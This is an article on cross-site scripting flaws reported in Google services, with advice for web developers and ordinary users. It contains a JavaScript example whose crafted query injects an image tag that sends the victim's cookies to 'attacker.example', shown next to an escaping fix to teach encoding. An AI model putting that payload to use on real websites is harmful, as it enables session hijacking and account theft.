It's a commonplace that online security threats are aimed at the biggest target available. In terms of operating systems, it's still Microsoft. But if you consider how people use the Internet, think G - G for Google, that is.
According to The Register (theregister.co.uk, motto "biting the hand that feeds IT"), Google's Gmail web-based email, its Picasa picture organizer, and the Google Search Appliance (the embedded search box used by websites that incorporate Google Search) have recently been shown to be vulnerable to cross-site scripting (XSS) attacks.
Web Info Pirates Fly the XSS Flag
What XSS Can Do to You
In the case of the most recent Google XSS problems, the vulnerabilities could be used to steal cookies, steal photos from Picasa and contacts from a Gmail account, and redirect Gmail messages to an attacker-chosen account. Although Google has taken action to block these attacks, this is just the latest round of XSS vulnerabilities suffered by Google - and by others. For example, the Samy worm (aka JS.Spacehero) used XSS to infect over a million MySpace users' pages in 2005, and a May 2007 ranking of websites with XSS vulnerabilities (available from this page) lists many major websites, including Flickr, Photobucket, Yahoo! and many others.
Stopping XSS - If You Can
The only sure way to stop XSS payloads from running in your browser would be to disable all scripting - unfortunately, in today's Internet, such a move would also break most commercial websites. Boring! And it treats the symptom: the flaw itself lives in the website, which writes user-supplied text into its pages without encoding it. So, what else can you do?
If you develop websites for fun or profit, encode every piece of user-supplied data before it is written into a page, and consider scanning your sites for XSS vulnerabilities with a tool such as the Web Vulnerability Scanner from Acunetix Ltd (a free version is available) or others. This Google search (ironic, isn't it?) will find more examples.
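To make the cookie-theft scenario from the previous section concrete, and to show what the encoding step above actually changes, here is an added example that is not code from the article or from Google: a hypothetical search-results page rendered two ways. The query string, the attacker host (attacker.example) and the helper names are all constructed for illustration. The malicious query closes the surrounding attribute, injects an image tag whose error handler posts document.cookie to the attacker, and is exactly the kind of link a victim would be tricked into clicking.

```javascript
// Added example, not from the article. Reflected XSS in a hypothetical
// search page: a vulnerable renderer next to a hardened one. The payload,
// page markup and attacker host are constructed for illustration.

// Attacker-controlled search term, as it would arrive via a crafted link.
// It breaks out of the surrounding markup and plants an <img> whose onerror
// handler sends the victim's cookies to the attacker's server.
const MALICIOUS_QUERY =
  `"><img src=x onerror="new Image().src='https://attacker.example/c?'+document.cookie">`;

// VULNERABLE: the search term is echoed straight into the HTML.
function renderResultsVulnerable(query) {
  return `<p>Results for: <b>${query}</b></p>`;
}

// Encode the five characters that have meaning in HTML text and attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: same page, but untrusted input is encoded before it touches markup.
function renderResultsHardened(query) {
  return `<p>Results for: <b>${escapeHtml(query)}</b></p>`;
}

// Minimal tag scanner used only to make the difference visible: returns the
// names of every opening tag the browser would actually see in the output.
const TAG_RE = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;

function tagNames(html) {
  return [...html.matchAll(TAG_RE)].map((m) => m[1].toLowerCase());
}

// True if any tag carries an on* event-handler attribute, i.e. script that
// will execute when the page is rendered.
function hasEventHandler(html) {
  return [...html.matchAll(TAG_RE)].some((m) => /\bon\w+\s*=/i.test(m[2]));
}

// Stand-alone demonstration: the vulnerable page now contains an <img> with
// an onerror handler; the hardened page contains only the template's <p>/<b>,
// and the payload is shown to the user as harmless text.
const vulnerableOut = renderResultsVulnerable(MALICIOUS_QUERY);
const hardenedOut = renderResultsHardened(MALICIOUS_QUERY);
console.log('vulnerable tags:', tagNames(vulnerableOut), 'script runs:', hasEventHandler(vulnerableOut));
console.log('hardened tags:  ', tagNames(hardenedOut), 'script runs:', hasEventHandler(hardenedOut));
```

Note that the hardened output still contains the characters "onerror=" as visible text; what matters is that every `<` and `"` from the input became `&lt;` and `&quot;`, so the browser never sees a new tag or attribute boundary. Escaping has to match the context the data lands in (here, HTML text); data placed inside a script block or a URL needs a different encoder, which is why scanners keep finding XSS on sites that do "some" escaping.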
But if you're an ordinary web user, not a developer, what are your options (other than disabling scripting, that is)?
1. If you use browser add-ons or other web-enabled products, install updates as soon as they're available. As with Windows updates, browser and add-on updates are often released to close security holes.
2. Keep in mind that any web-based service can be vulnerable to XSS, including the ones you trust with your email, photos and contacts.
3. XSS attacks are usually cross-browser threats: because the flaw is in the website rather than in the browser, switching to Firefox or Opera might not protect you.
4. Most XSS exploits also depend on old favorites like spoofed email and malicious links, since the payload typically rides in the address you click. As always, think before you click.